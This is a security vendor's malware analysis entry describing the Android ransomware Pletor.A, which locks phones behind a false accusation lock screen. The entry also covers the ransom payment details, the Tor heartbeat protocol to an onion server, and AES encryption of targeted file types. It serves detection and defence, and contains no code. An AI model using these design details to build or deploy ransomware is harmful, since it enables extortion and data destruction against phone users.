Android/Pletor.A!tr
Analysis
Android/Pletor.A!tr is a piece of ransomware targetting Android mobile phones.
The application was named "Sex xonix" in the sample analyzed. When launched, it hinders usage of the phone. The user sees a lock screen in Russian languge stating the phone was locked "for viewing and distribution [of] child pornography, bestiality and other perversions." The user is also asked to pay an amount of either
- 230 Ukranian Hryvnia (~15 Euros) via a service called MoneXy OR
- 1000 rubles via QIWI VISA WALLET to regain control of the phone and it's data.
Technical Details
The main application is called "Sex xonix" or "Shadow Fight 2" and comes in the package "org.simplelocker"
Fig1 : Application Icon
When the application is launched, the phone is 'locked' and the user sees an error message as seen in the figure below
Fig2 : Lock Screen Message
Fig3 : Lock Screen Message
This roughly translates to
WARNING your phone is locked! The device is locked for viewing and distribution child pornography, bestiality and other perversions. To Fight unlock you need to pay 260 UAH. 1. Locate the nearest terminal refill. 2. It get MoneXy. 3. Enter 380982049193. 4. Pipette 260 hryvnia, and then pay. Do not forget to take a receipt! After receipt of payment your device will be unlocked within 24 hours. In case of no PAYMENT YOU WILL LOSE ALL DATA ON ALWAYS have on your ustroytvo!
The malware prevents any usage of the phone beyond this point and any key event on the phone results in the above lock screen being displayed
Next, it sends a heartbeat message to the server http://xe[REMOVED]xs.onion/ using TOR and a local SOCKS proxy at port 9050
These messages are sent every 3 seconds and contain a JSON Object with the following values
- "type": "locker check"
- "device id": [first 10 digits of the device's IMEI number]
- "client number": "19"
Finally, the malware looks for files on the phone with the extensions
"jpeg", "jpg", "png", "bmp", "gif", "pdf", "doc", "docx", "txt", "avi", "mkv", "3gp", "mp4"and AES encrypts them with a hardcoded key present in the package
The encrypted files are saved with extension .enc and the original files are deleted
The malware can be 'disabled' and the files decrypted when the server mentioned further above responds with a JSON Object
"command": "stop"
Permissions required by the application:
- INTERNET
- ACCESS_NETWORK_STATE
- READ_PHONE_STATE
- RECEIVE_BOOT_COMPLETED
- WAKE_LOCK
- WRITE_EXTERNAL_STORAGE
- READ_EXTERNAL_STORAGE
Aimed at Ukranian & Russian users
Certificate information:
- Owner: CN=Android Debug, O=Android, C=US
- Issuer: CN=Android Debug, O=Android, C=US
- Serial number: 40e8512f
- Valid from: Mon May 12 12:45:55 CEST 2014 until: Wed May 04 12:45:55 CEST 2044
Recommended Action
- Make sure that your FortiGate/FortiClient system is using the latest AV database.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability
FortiGate | |
---|---|
Extreme | |
FortiClient | |
Extended | |
FortiMail | |
Extended | |
FortiSandbox | |
Extended | |
FortiWeb | |
Extended | |
Web Application Firewall | |
Extended | |
FortiIsolator | |
Extended | |
FortiDeceptor | |
Extended | |
FortiEDR |